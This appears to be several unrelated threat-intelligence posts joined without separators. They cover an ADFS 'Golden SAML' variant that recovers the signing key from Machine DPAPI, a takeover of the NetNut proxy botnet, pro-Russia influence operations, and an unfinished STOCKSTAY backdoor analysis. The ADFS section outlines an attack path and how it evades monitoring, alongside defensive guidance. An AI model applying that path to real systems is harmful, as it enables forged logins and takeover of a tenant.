The "Golden SAML" technique, first described by CyberArk researchers in 2017, and further detailed by Mandiant researchers in 2021, remains one of the most effective methods for threat actors to forge identity assertions in the Microsoft ecosystem. By obtaining the private key of an ADFS token-signing certificate, an attacker can authenticate as any user to any SAML-federated application, bypassing multifactor authentication (MFA), conditional access, and all identity-based controls.
However, during a recent red team engagement, Mandiant discovered that when ADFS certificates are manually rotated, configuration drift can silently leave active signing keys exposed in Machine DPAPI. Specifically, Mandiant discovered that in environments where AutoCertificateRollover is disabled and certificates are manually rotated, the database often becomes a 'ghost'—a record that still exists, still decrypts successfully, but references a certificate no longer used for token signing by the ADFS service. This attack vector warrants attention because the underlying configuration is commonly deployed in enterprise environments. The technique avoids direct interaction with components such as LSASS and the live ADFS service process, which are often subject to enhanced monitoring in enterprise environments, and may therefore result in lower visibility depending on the organization’s telemetry coverage. This post details how adversaries may exploit this TTP to forge high-privilege SAML tokens and provides the blueprint to defend against it.
Technical Insight: Encountering the ‘Ghost Certificate’
Analysts followed the standard DKM extraction path, retrieving the encrypted blob from the WID database and decrypting it using the DKM material stored in Active Directory. The extraction succeeded, but the recovered certificate was no longer valid for token signing, and Entra ID rejected the resulting tokens withAADSTS500172 due to invalid signing material. Although structurally correct, the artifact is not usable for authentication, as the active signing key resides in the system’s machine-scoped cryptographic store, protected by Windows Machine DPAPI and managed through the operating system’s cryptographic subsystem. Successfully obtaining this active key allows an attacker to forge valid SAML assertions for any user, bypassing the need for user credentials and multi-factor authentication, and granting unauthorized access to any SAML-federated application including Microsoft 365 and Entra ID within the organization's environment.
Analysis revealed thatAutoCertificateRolloverhad been disabled and a manual rotation had been performed. Confirmation was obtained directly viaGet-AdfsProperties, which returnedAutoCertificateRollover: False, indicating that certificate lifecycle management had been delegated to manual administrative processes. While the ADFS service used a new valid key for signing, the WID configuration database was never updated to reflect the new certificate—leaving an expired "ghost" entry as the only record. This drift condition surfaces via Microsoft Event ID 385, which indicates certificate validity warnings in the ADFS service. Notably, this event self-resolves whenAutoCertificateRolloveris re-enabled and a subsequent certificate rollover is performed; in environments where it is disabled and manual rotation is performed without a corresponding database update, it is the observable symptom of this drift condition.
Figure 1: ADFS certificate enumeration output showing configuration drift between the WID database and the active host certificate
ADFS maintains private keys in two protection contexts. In Location 1 (User DPAPI), encrypted key blobs may exist on disk, but the DPAPI protection is tied to the service account's SID and associated DPAPI masterkey material. In the assessed environment, the domain DPAPI backup key approach successfully decrypted masterkey material for interactive user profiles, but returned no decryptable material associated with the ADFS service account profile. All subsequent offline decryption attempts similarly failed, consistent with the masterkey not being recoverable through the evaluated on-disk recovery approach in this environment—though this observation is bounded to the assessed environment and does not represent a universal architectural property of all ADFS deployments.
Location 2 (Machine RSA) does not rely on a user-specific logon session. Instead, the key material is protected using Machine DPAPI, leveraging theDPAPI_SYSTEMLSA secret together with machine masterkeys available to sufficiently privileged SYSTEM-level contexts.
Why the WID Path Misses This Key
In ADFS environments experiencing configuration drift—commonly arising during manual certificate rotations whereAutoCertificateRolloveris disabled—the ADFS service host can successfully bind to a newly provisioned signing certificate at the operating-system level, ensuring continued service operation. However, the WID configuration database may not reflect the current signing certificate, resulting in stale certificate metadata.
This divergence between configuration and runtime state is the condition that ADFS Event ID 385 is designed to flag. As a consequence, extraction techniques that rely solely on the WID database and DKM material may return certificates that are no longer used for active signing, leading to rejected assertions in downstream federation scenarios.
Understanding How the Machine DPAPI Store Becomes Populated
Understanding how the Machine DPAPI store becomes populated requires examining how ADFS persists its token-signing key material. During initial deployment, automatic certificate rollover, or manual certificate rotation, ADFS persists its RSA private key material in the machine-scoped CAPI key store at C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\, protected using machine DPAPI context rather than a user-bound DPAPI context. SharpDPAPI/machineenumeration in the assessed environment confirmed that the active machine key material resided under this path, while the CNGCrypto\Keysstore was not observed in use in the assessed environment.
The protection chain relies on theDPAPI_SYSTEMLSA secret together with machine masterkeys associated with the S-1-5-18 security context, stored inC:\Windows\System32\Microsoft\Protect\S-1-5-18\as DPAPI-protected key material—both components ultimately resolvable only within highly privileged SYSTEM-level contexts on the host. The corresponding certificate is enrolled into the LocalMachine\Mycertificate store, from which ADFS retrieves the associated private key during token-signing operations.
The architectural rationale for machine-scoped key storage is operational resilience. A machine-scoped key remains usable across service account password changes, gMSA rotations, system reboots, and service restarts without requiring key reprovisioning or dependency on a specific interactive logon session. This design ensures that the ADFS service can consistently access the signing key regardless of changes to the underlying service account credentials.
However, this same design choice has important security implications. Because the private key is protected using Machine DPAPI rather than a user-bound DPAPI context, a sufficiently privileged local process capable of accessing the machine key store and associated DPAPI artifacts may be able to recover the key material independently of the original service logon session. As a result, under certain conditions, recovery of the active ADFS token-signing private key may be achievable without direct interaction with LSASS memory or the live ADFS service process itself, potentially reducing visibility to defenses primarily focused on credential dumping or process-memory access behaviors.
KEY DESIGN IMPLICATION
ADFS persists its token-signing private key material in the machine-scoped key store, protected using Machine DPAPI semantics. This is a documented behavior enabling machine-scoped key persistence that survives service account changes, credential rotations, and service restarts.
However, this design introduces an operational security implication that is not commonly emphasized in standard ADFS hardening guidance: private keys stored within the machine key store are protected using this protection model and may be recoverable by a sufficiently privileged SYSTEM-level context through access to the DPAPI_SYSTEM LSA secret and machine masterkeys available locally on the host.
As a result, recovery of the active ADFS token-signing private key may be achievable without direct interaction with LSASS memory or the live ADFS service process itself, potentially reducing visibility to security controls primarily focused on credential dumping or process-memory access behaviors.
Attack Flow: Machine DPAPI Key Recovery to SAML Forgery
Figure 2: Machine DPAPI extraction flow—five-step process from SYSTEM execution to SAML assertion
Figure 3: ‘SharpDPAPI /machine’ output confirming successful recovery of the active ADFS token-signing private key from the machine DPAPI store
The recovered key was used to forge a SAML assertion impersonating a Global Administrator identity, which Entra ID accepted as a valid authentication assertion, resulting in authenticated access at Global Administrator privilege level within the federated Microsoft 365 tenant.
Detection and Hunting
Defenders should prioritize visibility into operating system-level cryptographic operations and identity issuance behavior, rather than relying solely on application-layer configuration stores.
SACL-Based Object Access Monitoring: Configure object access auditing via SACLs onC:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\andC:\Windows\System32\Microsoft\Protect\S-1-5-18\. When configured correctly, this generates Security Event ID 4663 for file access attempts. Coverage depends on SACL configuration and access paths; treat this as supporting evidence in correlation-based detection rather than a stand-alone signal.
ADFS Token Issuance Consistency: Monitor for inconsistencies between primary authentication events and token issuance events in ADFS audit logs. Relevant events include token issuance and claims processing records (Event IDs 299, 1200-series, depending on ADFS version and audit configuration). The objective is to identify token issuance that cannot be clearly correlated to a preceding authentication context. This is most effective when normal authentication patterns per relying party trust are baselined.
Federated Identity Monitoring in Entra ID: Entra ID sign-in logs will record an accepted forged assertion as a standard federated sign-in event. Detection requires cross-correlating Entra ID sign-in records against ADFS-side issuance logs—neither source in isolation is sufficient. For privileged accounts, focus on unexpected Internet Protocol (IP) ranges, claim set deviations,and user-agent inconsistencies.
Mitigation and Remediation
ADFS infrastructure should be treated as Tier 0 identity infrastructure, equivalent in criticality to Domain Controllers. If SYSTEM access is achieved on an ADFS host, the signing key must be considered compromised.
Hardware-Backed Key Protection: Migrate token-signing certificates to a Hardware Security Module (HSM). HSM-backed keys ensure private key material does not exist in software-accessible storage on the host, eliminating the Machine DPAPI extraction path entirely.
gMSA Service Identity:Run ADFS services using Group Managed Service Accounts to automate credential rotation and reduce operational drift in service identity management. While this does not directly address machine-scoped key protection, it eliminates manual credential management as a contributing factor to configuration drift.
Tier 0 Administrative Controls: Govern ADFS servers with strict Tier 0 controls: restricted administrative access pathways, dedicated Privileged Access Workstations (PAWs), separation from general server administration domains, and enhanced privileged access monitoring.
Certificate Rotation and Configuration Validation: If compromise is suspected, rotate the token-signing certificate and validate consistency across ADFS configuration, the LocalMachine\Mystore, and federation metadata. Do not rely on a single source of truth. For environments with AutoCertificateRollover disabled, manual rotation must include updating ADFS via Set-AdfsCertificate—installing the certificate alone is insufficient. Validate using Get-AdfsCertificate after rotation. If Event ID 385 appears afterward, investigate for configuration inconsistency.
Multicloud Scope Awareness: A compromised ADFS token-signing key affects all SAML relying party trusts, not just Microsoft services. Organizations using ADFS for identity federation across other software-as-a-service (SaaS) platforms should treat ADFS as Tier 0 infrastructure and audit all relying party trusts. Migrating away from ADFS-based federation (e.g., to native OIDC federation) removes this specific attack path.
Today, in coordination with the FBI, Lumen, and others, Google took action against the NetNut residential proxy network, also known as Popa. This action builds on our disruption of the IPIDEA proxy network that took place in January 2026, and is a continuation of Google’s objective to dismantle malicious residential proxy networks.
Actions Taken
As a part of this disruption we took the following actions:
Disabled Google accounts and associated Google services used by NetNut for malware command and control (C2), which directly violates Google’s Terms of Service and Acceptable Use Policy.
Shared technical intelligence on NetNut software development kits (SDKs) and backend C2 infrastructure with platform providers, law enforcement, and research firms to help drive ecosystem-wide awareness and enforcement.
We ensured Google Play Protect, Android’s built-in security protection, automatically warned users and disabled applications known to incorporate NetNut SDKs, and the system will continue to protect users against future install attempts. These efforts to help keep the broader digital ecosystem safe supplement the protections we have to safeguard Android users on certified devices.
We believe our coordinated actions have caused significant degradation to NetNut’s proxy network and its business operations, reducing the available pool of devices for the proxy operator by millions. In addition to selling access to the network under the NetNut brand, NetNut has a robust reseller program that allows whitelabeling of its network. Google has high confidence that many popular residential proxy brands are in fact whitelabeling the NetNut botnet. While we expect this disruption to have a larger ripple effect across the residential proxy ecosystem, observations after the disruption of IPIDEA proved that individual networks can appear resilient. What we have observed is that when faced with the degradation of their own botnet, proxy operators begin buying capacity from their competitors, effectively becoming a reseller. We recognize that creating a lasting disruption in this fluid ecosystem means we must scale our efforts to target the infrastructure of several interconnected providers. We will continue to observe the composition of the NetNut network and map out how its peers adapt to this action.
Why it Matters
NetNut is among the largest and most popular residential proxy networks. Estimating the size of residential proxy networks is extremely challenging, but Google Threat Intelligence Group (GTIG) estimates the size of the NetNut network to be at least 2 million devices, distributed across the world. Public reporting by KrebsOnSecurity and others, confirmed by Google, illustrates that NetNut populates its botnet by distributing SDKs for devices commonly found in homes, such as smart TVs and streaming boxes. GTIG has also identified NetNut botnet plugin components for large-scale botnets such as Badbox 2.0.
Residential proxy networks sell the ability to route traffic through IP addresses owned by internet service providers (ISPs), allowing attackers to mask malicious activity by hijacking these IP addresses. A robust residential proxy network requires controlling millions of residential IP addresses to sell to customers for use. To accomplish this, operators need code running on home devices to enroll them into the malicious network as exit nodes. Home devices become part of proxy networks either because they are pre-installed with malware before purchase or because users unknowingly download applications containing hidden proxy code. This creates serious risks for unsuspecting device owners, as their home IP addresses can be used by attackers as a launchpad for hacking and other unauthorized activities. Consequently, users can have their legitimate traffic flagged as suspicious, or blocked by their service providers.
In a single week during June 2026, GTIG observed 316 distinct threat clusters using suspected NetNut exit nodes, including cybercriminal and espionage groups. These bad actors can use NetNut to mask their origin IP address when accessing victim environments, accessing their own infrastructure, and conducting password spray attacks. Furthermore, when a consumer device becomes an exit node, unauthorized network traffic passes through it. This means bad actors can access other private devices on the same home network, effectively exposing them to Internet threats. Public reports by Synthient, Spur, Nokia Deepfield, and others have documented the use of NetNut to infect devices with variants of Mirai DDoS botnets.
Empowering and Protecting Consumers
Consumers should be extremely wary of applications that offer payment in exchange for "unused bandwidth" or "sharing your internet." These applications are primary ways for malicious proxy networks to grow, and could open security vulnerabilities on the device’s home network. We urge users to stick to official app stores, review permissions for third-party VPNs and proxies, and ensure built-in security protections like Google Play Protect are active.
Consumers should be careful when purchasing connected devices, such as set top boxes, to make sure they are from reputable manufacturers. For example, to help you confirm whether or not a device is built with the official Android TV OS and Play Protect certified, our Android TV websiteprovides the most up-to-date list of partners. You can also takethese stepsto check if your Android device is Play Protect certified.
Future Work
As we noted earlier this year, the residential proxy industry appears to be rapidly expanding, and this coordinated disruption is not the end of our work combating malicious residential proxy networks. This industry is deeply connected and operators depend on overlapping botnet networks that are constantly resold. While point-in-time disruptions are a critical tool to protect our users, continued and coordinated effort is needed to reduce malicious proxy networks in the long run. We encourage mobile platforms, ISPs, and other tech platforms to continue sharing intelligence and to take direct action to block malicious C2 infrastructure.
Four years into Russia’s full-scale invasion of Ukraine, the pro-Russia influence ecosystem has evolved from a tool of war back into a global strategic asset. Since the mobilization of this ecosystem to support frontline objectives, we have witnessed the expedited development of new influence assets linked to multiple, expansive, covert information operations (IO) campaigns and a revitalization of pro-Russia hacktivism at an unprecedented scale. While this threat activity initially adapted to encompass Ukraine-related priorities, it is gradually pivoting back to established Russian influence objectives for which the ecosystem was originally honed. This shift is significant because it likely signals increased focus outside of Ukraine, warning that pro-Russia influence activity targeting the European Union (EU), North Atlantic Treaty Organization (NATO), and other top targeting priorities may intensify.
Ultimately, the war in Ukraine has provided a critical feedback loop for Russia to refine its influence activity, lessons that we anticipate will be applied as the ecosystem continues to reorient toward global strategic objectives while maintaining focus on Ukraine. Further, recent pro-Russia IO indicates the continued expansion of already diverse tactics, and the increasing use of generative AI tooling for planning, research, and content creation marks a forward trend in pro-Russia IO. Meanwhile, new and different actors have adopted IO tactics to meet an increasingly diverse set of challenges, signaling growing Russian reliance on influence tactics. Together, these trends likely demonstrate the Kremlin's perception of these tactics as cost effective and successful. The interconnected nature of the ecosystem's disparate components makes it resilient to limited scope disruptions, which defenders must consider to effectively mitigate pro-Russia influence threats.
The Ecosystem at a Glance: Objectives, Targeting, and Tactics
Russia's modern approach to information operations is built on the conceptual foundation of Soviet-era "active measures" adapted for the digital age. Alongside disruptive cyberattacks dating back to the early 2000s, the Kremlin has increasingly harnessed internet-based platforms for espionage and information operations. Russia's approach has evolved from rudimentary, singular operations into a complex, self-sustaining environment intentionally curated by the Russian Government that blends overt, covert, and independent elements to advance Kremlin interests both at home and abroad.
Core Influence Objectives
GTIG’s observations suggest the primary strategic motivations driving the pro-Russia influence ecosystem fall into five categories, each aiming to achieve military and/or political objectives through psychological manipulation of the target audience (Figure 1). Collectively, these objectives informally depict a global influence strategy: through the furthest reach of its influence, the Kremlin seeks to diminish Western primacy and advance Russia's global position; within its surrounding region, it strives to retain and return Moscow's dominance; and at home, it works to ensure the stability of the political regime.
Figure 1: Core objectives of the pro-Russia influence ecosystem
Targeting
Pro-Russia influence operations are pivoting from the near singular focus on Ukraine that dominated the ecosystem since 2022. We expect influence operations advancing Russia's war-specific interests to continue. However, as Russia seeks to reemerge from international isolation, we have increasingly observed a concurrent focus on pre-war pro-Russia influence objectives.
The current and historical targeting scope of each ecosystem component exposes both the Kremlin's global ambitions and the realistic limitations of its power projection. State-owned media organizations produce content intended to serve populations across six continents, but in recent years, sanctions and other factors have limited its production and distribution. Meanwhile, covert operations have appeared more limited in scope, primarily targeting the West and countries surrounding Russia, with intermittent operations targeting the Middle East and Africa, indicating that finite resources necessarily limit these operations (Figure 2).
Top Regional Targets
The United States and Europe: The Kremlin has long viewed the West as a top adversary of Russia. Accordingly, the US and Europe are top targets of covert pro-Russia information operations, especially aimed at undermining political stability within these countries and the unity between them. NATO and the EU embody the collective "West" and are Russia's perceived top adversaries, second only to the US independently.
Russia's "Near Abroad": Since the dissolution of the Soviet Union, Moscow has asserted that the countries that formerly comprised part of the USSR now reside in Russia's so-called "sphere of influence." Covert influence targeting this region directly reflects Moscow's assertion that Russia is a world power entitled to special privileges within its neighborhood.
The Middle East and Africa: Over the past decade, Russian efforts to reassert itself as a global power have included high-profile investments in cultivating Russia's standing in the Middle East and Africa. Covert pro-Russia influence activity is likely deployed in tandem as intended support for other Russian initiatives in these regions.
Russia Domestic: Internally targeted covert IO is a well-established component of pro-Russia influence activity, deployed by regime-aligned actors to promote Kremlin policies and repress opposition voices.
Targeted Entities and Global Events
The Olympics: Russia has long viewed Olympic participation as a point of national prestige, and GTIG has observed notable Russian influence activity targeting the Olympics in the face of Russian participation bans.
War in Ukraine: The war in Ukraine has been a key driver of Russia's influence activity, including attempts to influence events on the ground as well as influence activity intended to advance Moscow's interests elsewhere vis-a-vis the war. GTIG expects that Ukraine will remain a priority in Russia's targeting calculus during the post-conflict phase following any future peace agreements.
Elections: Election targeting aligns with multiple Russian influence objectives, including attempting to undermine confidence in democratic institutions as well as internally weakening perceived Western adversaries. These operations regularly target elections in countries that are already prioritized by ongoing pro-Russia influence activity.
Ad Hoc Geopolitical Flashpoints and Global Events: Russian influence actors have a history of pivoting activity to engage with emerging geopolitical developments and events, such as the COVID-19 pandemic or the 2026 Middle East conflict. This flexible target selection often overlaps or is aligned with other Russian priorities, making previously observed Russian influence activity helpful in anticipating which events may be appropriated.
Figure 2: Priority targets of the ecosystem
Tactics
Converging geopolitical and technological developments make the evolution of pro-Russia influence tactics a particularly important space to monitor right now. The pro-Russia influence ecosystem expanded to support the war effort, bringing change across the spectrum of activity and providing operators the opportunity to hone their tactics, techniques, and procedures (TTPs) in the rapid feedback loop of war. Meanwhile, the emergence and increased democratization of generative AI tooling has brought both promised and already realized opportunities to support all phases of the IO lifecycle. The following are a sample of key tactics that illustrate how pro-Russia actors currently blend well-tested methods with new technological developments to reach audiences through diverse means:
Generative AI: GTIG has observed pro-Russia influence actors increasingly leverage AI tooling to support different stages of their operations, including support for planning and general research as well as content creation.
Google Threat Intelligence Group (GTIG) is closely tracking the transition from nascent AI-enabled operations to the maturing, industrial-scale application of generative models within adversarial workflows across threats ranging from espionage and crime to IO. Please see our latest AI threat tracker for more information on how this threat is developing based on our insights, and what Google is doing to protect our customers.
Narrative Resonance: Hijacking existing ideological and emotional fissures within a society provides pro-Russia influence actors tailored narratives to target audiences and potentially increases potential engagement and impact.
Cyber-Enabled IO: Influence campaigns frequently coincide with destructive cyberattacks, such as the deployment of wiper malware alongside website defacements containing false surrender messages, or the historic use of "hack and leak" campaigns in which exfiltrated data, sometimes manipulated, is then publicized through an actor-controlled false persona. In some instances, Russian actors may even leverage direct cyber espionage targeting as a way to achieve psychological effects, intending to influence victims' behavior through intimidation.
Media Mimicry: Pro-Russia actors have attempted to mimic legitimate media at scale and through a variety of means, including via the wholesale appropriation of legitimate media brands or developing inauthentic media brands that generally masquerade as independent news sources. These tactics are intended to add a veneer of legitimacy to the promoted narratives.
Direct Dissemination: Pro-Russia influence actors have used closed communication channels, such as emails, SMS text messages, and messenger apps, to disseminate various types of pro-Russia narratives as an adjunct to or outside typical social media-focused operations.
Core Ecosystem Components
The current pro-Russia influence ecosystem operates across a spectrum from official government communications to deniable covert actions conducted by intelligence services and "patriotic" proxies. GTIG identified six core components that represent key activity types (Figure 3). While many elements are state-directed or state-affiliated, the ecosystem is also a cultivated, self-sustaining system: various actors, often without explicit direction, amplify Kremlin-friendly narratives and pursue actions that advance Russia's strategic interests. This fluidity provides resilience and complicates attribution, mirroring the longstanding Kremlin strategy to co-opt non-state actors, including criminal networks for finance or illicit logistics, to achieve state objectives without direct attribution. Although each of the core ecosystem components serves as a unique lever the Russian Government can employ to achieve desired objectives, they are regularly used together. For instance, while the entire pro-Russia hacktivist landscape is not state-sponsored, the Russian intelligence services have used both genuine and fabricated hacktivist personas to launder stolen data as part of blended cyber espionage and IO hybrid operations.
Figure 3: Core components of the pro-Russia influence ecosystem
An Interconnected Ecosystem Enhances Influence Utility
Figure 4 illustrates the complex, interconnected nature of the pro-Russia influence ecosystem by mapping relationships between a selection of key actors and organizations across five of the core components. The ecosystem functions as a cohesive unit, not only through shared objectives, but also through direct cross-component interactions. The Russian Government functions as the sixth core ecosystem component, setting the policy and talking points that inform the ecosystem’s promoted narratives and sponsoring overt and covert assets throughout the other five components diagrammed in Figure 4. Through these levers, the Kremlin fosters the cross-component links that underpin the ecosystem, enhancing its overall utility as a versatile tool of state influence.
Figure 4: Subset of actors that illustrate how different components of the ecosystem interact with each other
10 Key Dynamics for Understanding the Pro-Russia Influence Ecosystem
The scope and diversity of activity in the pro-Russia influence ecosystem challenges defenders tasked with enumerating, tracking, and countering its threats. GTIG has distilled 10 key ecosystem dynamics based on our current understanding of its components and how they each enable covert influence activity. These dynamics frame critical aspects of how activity manifests within the ecosystem, providing a high-level guide to understand and track these threats.
Large-scale IO campaigns are an integral element of the pro-Russia influence ecosystem. Major pro-Russia IO campaigns have been an enduring feature of the pro-Russia ecosystem, with new campaigns emerging as previous ones fall into inactivity. Maintaining extensive IO campaigns and their associated established influence infrastructure enables proactive messaging on strategic issues and underpins a capability that can be rapidly adapted for emerging domestic and global priorities.
Long-established IO campaigns, like Secondary Infektion, pivoted to meet new strategic needs as Russia’s 2022 invasion of Ukraine began. New IO campaigns, such as “Operation Overload,” subsequently emerged to support the war effort; while Secondary Infektion has become dormant, these “successor” campaigns have since been leveraged to advance other global Russian influence objectives beyond the war itself.
Pro-Russia actors often prioritize persistence and the range of tactics they leverage reflects this. In the face of public exposure and disruption, pro-Russia actors and their infrastructure have often remained persistent, sometimes making tactical adjustments to mitigate the effects of detection and disruption and other times continuing operations unabated.
These persistence tactics include the Doppelganger campaign and overt Russian media’s respective cycling of domain infrastructure and/or use of mirror domains to overcome exposure, platform bans and sanctions. Influence operators also frequently continue using compromised assets, sometimes mocking their exposure, as seen with the legacy US-targeted NAEBC campaign and the APT44-affiliated hacktivist persona XakNet Team.
Figure 5: NAEBC-linked persona account mocking public exposure of influence assets (left), and GRU-sponsored XakNet Team persona mocking then-Mandiant (now part of Google Threat Intelligence Group) attribution of the group’s activities to the GRU (right)
Pro-Russia and Russian cyber espionage groups leverage IO tactics to support their operations and weaponize stolen data and/or illicit access. While less frequent, this hybrid activity is a critical dynamic within the pro-Russia influence ecosystem. GTIG has previously observed operations used to shape narratives around cyberattacks and influence events on the ground and to conduct foreign political interference, including the repeated targeting of foreign elections, reported in Spring 2024. We have attributed some observed instances of this to Russian government-sponsored threat actors.
Russian state sponsored or pro-Russia hacktivist groups have long relied on public advertisement of real or claimed data exfiltration to highlight their operations, intimidate targets, or sway public opinion. In 2022, UNC4057 (COLDRIVER) used data stolen from espionage targets in a high profile hack-and-leak operation seeking to exacerbate divisions in UK politics. More recently, the self-proclaimed hacktivist group PalachPro claimed in February 2026 to have gained unauthorized access to a Ukrainian government online portal and publicly posted screenshots of the claimed compromise. The Ukrainian government has previously noted that the portal does not store the type of data the threat actor claimed to compromise, suggesting the public posting was likely intended as influence activity, attempting to create the illusion of a more serious threat.
Figure 6: UNC4057 leak website attempting to inflame public debate
Pro-Russia hacktivists serve a direct influence function. Modern pro-Russia hacktivism has evolved into an important component of the influence ecosystem that blends state-backed actors leveraging hacktivist tactics with an evolving cohort of likely third-party hacktivist actors that support Russia's geopolitical interests. Pro-Russia hacktivist groups gain domestic and foreign attention for strategic messaging via their claimed threat activity, amplify narratives directly seeded in overt ecosystem segments, and at times also support traditional IO activity or create a means of plausible deniability for state-sponsored espionage actors.
The self-proclaimed hacktivist group NoName057(16) emerged following the Russian invasion of Ukraine in 2022, primarily targeting Ukraine and its partners and allies with DDoS attacks and various network intrusions. It has targeted high profile events, such as the Milano Cortina Winter Olympics, institutions like the French National Assembly, and critical infrastructure and transportation targets in Germany. Often their messaging cites grievances with overt acts of Western support for Kyiv, suggesting the group advances Russian interests not only through the targeting of perceived Russian adversaries but also in gaining attention for its pro-Russia messaging.
Established ecosystem components facilitate the cultivation of new assets and activity. Inter-ecosystem cross-promotion helps overcome challenges of audience building by directing traffic toward new assets, operations, and narratives, enabling rapid deployment of new and existing IO capabilities. This directly supports a self-sustaining cycle that maintains and expands the ecosystem.
The hacktivist persona JokerDNR played a significant role in amplifying the APT44-linked persona Solntsepek when its doxxing-focused Telegram channel first launched and then again as it began claiming cyber espionage activity.
Domestic Russian audiences are a longstanding target of the pro-Russia influence ecosystem. Internally directed influence activity has often involved the promotion of Kremlin policies and talking points and the denigration of opposition voices and ideas, conducted by both overt and covert segments of the ecosystem.
Ahead of Russia’s March 2024 presidential election, GTIG identified the hybrid espionage and influence actor UNC5101 register domains and conduct associated influence operations attempting to deceive Russian opposition voters about the timing of an anti-Putin protest.
Ecosystem actors respond to the same set of internal shifting circumstances and external geopolitical developments, often leading to seemingly similar, but ultimately distinct, activity. These shared drivers and general motivational alignments encourage actors to "spontaneously" coalesce around a particular topic or narrative. While this can appear superficially similar, this phenomenon is distinct from instances of actor coordination and campaign linkages, which is less common.
Systemic flexibility is a central feature, with influence assets able to mobilize both incrementally and at scale to advance Russian interests. The Russian Government is able to mobilize assets across the ecosystem to respond to strategic events. Meanwhile, individual or aligned actors can separately mobilize to address tactical needs, allowing the ecosystem to concurrently message on multiple issues across different geographies (Figure 7).
Russia demonstrated its ability to focus the ecosystem on a single strategic issue like the Russian invasion of Ukraine. Simultaneously, discrete assets have addressed tactical events, such as when Portal Kombat briefly promoted narratives about a Russian drone incursion into Poland concurrently with other covert pro-Russia influence activity.
Figure 7: Tactical responses are executed by individual or coordinated/aligned clusters of actors to address emerging developments
Overt Russian media contributes to, and is connected with, multiple covert influence components. The overt components of Russia's influence infrastructure play a critical role within the broader Russian influence ecosystem beyond the commonly understood function of providing a public platform for government-aligned narratives and official talking points; overt media helps to drive (inform targeting) and amplify covert pro-Russia influence activity, seeding desirable narratives within the ecosystem and providing an indirect conduit between the Kremlin and a disparate array of influence actors. Overt media outlets have directly coordinated their activity with covert actors and have increasingly employed IO tactics to disseminate their own content in the face of sanctions and platform bans (Figure 8).
US Government sanctions in late 2024 indicated that Russian state media company Russia Today (RT) directly conducted covert influence operations, including on behalf of the Russian intelligence services. Further, RT employees reportedly interacted with members of the self-proclaimed hacktivist group RaHDit, which has claimed to collaborate with multiple other pro-Russia hacktivist groups, illustrating the layered connections between overt media, Russian intelligence services, and hacktivist groups.
Figure 8: Overt Russian media maintains multiple links with the covert segments of the ecosystem
Outsourcing IO capability development and campaign execution to third-party organizations and proxies enables scaling and obfuscation. Outsourcing is used for developing custom tooling and bolstering both human and organizationalcapacity. While custom tool development facilitates operators in all phases of the IO lifecycle, Russian government actors can flexibly leverage different models for outsourcing campaign execution based on their specific needs. Proxy actors can also generate plausible deniability (Figure 9).
GTIG reported how Russian IT contractor NTC Vulkan (Russian: НТЦ Вулкан) worked with the Russian intelligence services, including providing tooling and support for the GRU unit that sponsors APT44 activity. Separately, US government sanctions detailed how the Doppelganger campaign is supported by multiple Russian contractors under the sponsorship of the Russian Presidential Administration.
Figure 9: Outsourcing and proxies support capability development and campaign execution for covert influence activity
Conclusion
Multiple factors are propelling the evolution of the pro-Russia influence ecosystem we have observed since Moscow’s full scale invasion of Ukraine four years ago. The Kremlin mobilized the entire ecosystem to support the ongoing conflict, which has provided rapid feedback and driven significant investment in new and established overt and covert influence assets. At the same time, pro-Russia actors are increasingly experimenting with generative AI to enhance their workflows. This condensed period of adaptation, alongside signals suggesting Russia's growing reliance on IO tactics to navigate new challenges, raises concerns regarding how a potentially diversifying pool of actors will leverage advancements in tradecraft and scalability. As Russia seeks to emerge from international isolation and reorients its influence ecosystem back toward global objectives, it is critical for defenders to understand how this ecosystem provides the Kremlin with a durable influence capability in order to better anticipate future Russian influence threats.
Additional Tools and Resources
For mitigation and hardening recommendations, please review the following:
Google offers a suite of free of cost tools to help protect high-risk users from the most pervasive digital attacks, to which politicians, journalists, and campaigns are often most vulnerable. Examples include protecting accounts from targeted attacks with Advanced Protection Program and safeguarding campaign websites from DDoS attacks with Project Shield.
Google Threat Intelligence Group (GTIG) has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla (aka SUMMIT, Secret Blizzard, VENOMOUS BEAR, UAC-0194) since at least December 2022. Turla has deployed STOCKSTAY against government and military organizations in Ukraine, as well as entities with an interest in Italian foreign policy. Used for ongoing cyber espionage, this backdoor shares significant code and functional overlaps with KAZUAR, a successful toolkit previously attributed to Turla. The group has a long history of targeting a wide range of industries, with a particular focus on western Ministries of Foreign Affairs, and defense organizations within the context of heightened political tensions.
Turla, and specifically their longstanding Snake implant, has been publicly attributed by the United States Cybersecurity and Infrastructure Security Agency (CISA) to Center 16 of Russia’s Federal Security Service (FSB). Turla is one of the oldest known cyber espionage groups with suspected activity dating back to at least 2004. The actor remains active and continues to evolve its delivery methods, as demonstrated by its deployment of specialized scripts to intercept secure communications from Signal Messenger users, its hijacking of legacy criminal botnets to target Ukrainian organizations, and its recent campaigns targeting military defense sectors using the highly sophisticated KAZUAR toolkit. As part of our continued tracking of this group, this blog post provides an overview of our STOCKSTAY analysis, includes a timeline of key developmental and operational observations, and examines its similarities to KAZUAR to contextualize this new capability within Turla’s ever-growing arsenal.
STOCKSTAY Overview
STOCKSTAY is a multi-component backdoor written in .NET, using the Windows Forms framework, which communicates with its command and control (C2) via a secure WebSocket connection, utilizing the open-source websocket-sharp library. STOCKSTAY consists of several distinct components that communicate with one another via an inter-process communication (IPC) channel, based on the exchange of WM_COPYDATA messages.
STOCKSTAY was originally designed to masquerade as a stock market data viewing tool, incorporating this disguise in both its file naming scheme and its storage of implant configuration, control messages, and response data. While initial versions of the malware observed by GTIG retained the internal aspects of this disguise, in 2025 we identified variants of STOCKSTAY masquerading as other benign applications, such as PDF viewers and calculator utilities.
Figure 1: Overview of STOCKSTAY malware architecture
STOCKSTAY.STOCKBROKER
STOCKSTAY.STOCKBROKER is a proxy-aware tunneler which provides network communication capabilities to the wider STOCKSTAY ecosystem. STOCKSTAY.STOCKBROKER, internally referred to as "net", can be instructed to establish a secure WebSocket connection to a specified remote server, after which it acts as a relay between the server and the STOCKSTAY.STOCKMARKET orchestrator. As a result, all C2 communication between STOCKSTAY and the configured C2 server are handled by STOCKSTAY.STOCKBROKER, isolating the malware’s network communications from other malicious host-based activity on the infected machine.
STOCKSTAY.STOCKMARKET
